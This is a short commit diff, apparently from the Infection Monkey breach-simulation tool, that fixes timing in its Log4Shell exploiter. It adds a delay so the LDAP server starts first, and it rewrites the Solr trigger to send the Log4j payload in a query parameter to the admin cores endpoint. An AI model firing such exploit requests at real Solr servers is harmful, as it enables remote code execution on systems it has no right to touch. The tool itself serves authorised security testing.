Agent: fix race condition between ldap server and malicious requests

monkey/infection_monkey/exploit/log4shell.py

@@ -34,6 +34,7 @@ class Log4ShellExploiter(WebRCE):
     _EXPLOITED_SERVICE = "Log4j"
     DOWNLOAD_TIMEOUT = 15
     REQUEST_TO_VICTIM_TIME = 5  # How long the request from victim to monkey might take. In seconds
+    LDAP_SERVER_INIT_DELAY = 5  # Time period that code halts waiting for ldap server to start
 
     def __init__(self, host: VictimHost):
         super().__init__(host)
@@ -111,6 +112,8 @@ class Log4ShellExploiter(WebRCE):
         # constructor directly after merging to the agent-refactor branch.
         self._ldap_server_thread = Thread(target=self._ldap_server.run, daemon=True)
         self._ldap_server_thread.start()
+        logger.debug(f"Sleeping {Log4ShellExploiter.LDAP_SERVER_INIT_DELAY} seconds for ldap process to start")
+        sleep(Log4ShellExploiter.LDAP_SERVER_INIT_DELAY)
 
     def _stop_servers(self):
         logger.debug("Stopping all LDAP and HTTP Servers")

monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py

@@ -13,9 +13,10 @@ class SolrExploit(IServiceExploiter):
 
     @staticmethod
     def trigger_exploit(payload: str, host: VictimHost, port: int):
-        url = f"http://{host.ip_addr}:{port}/solr/admin/cores"
-        payload = {"foo": payload}
+        url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
         try:
-            resp = requests.post(url, data=payload, timeout=5, verify=False)  # noqa DUO123
+            logger.debug("Sending malicious SOLR log4j request")
+            requests.post(url, timeout=5, verify=False)  # noqa DUO123
+            logger.debug("Request sent")
         except requests.ReadTimeout as e:
             logger.debug(f"Log4shell request failed {e}")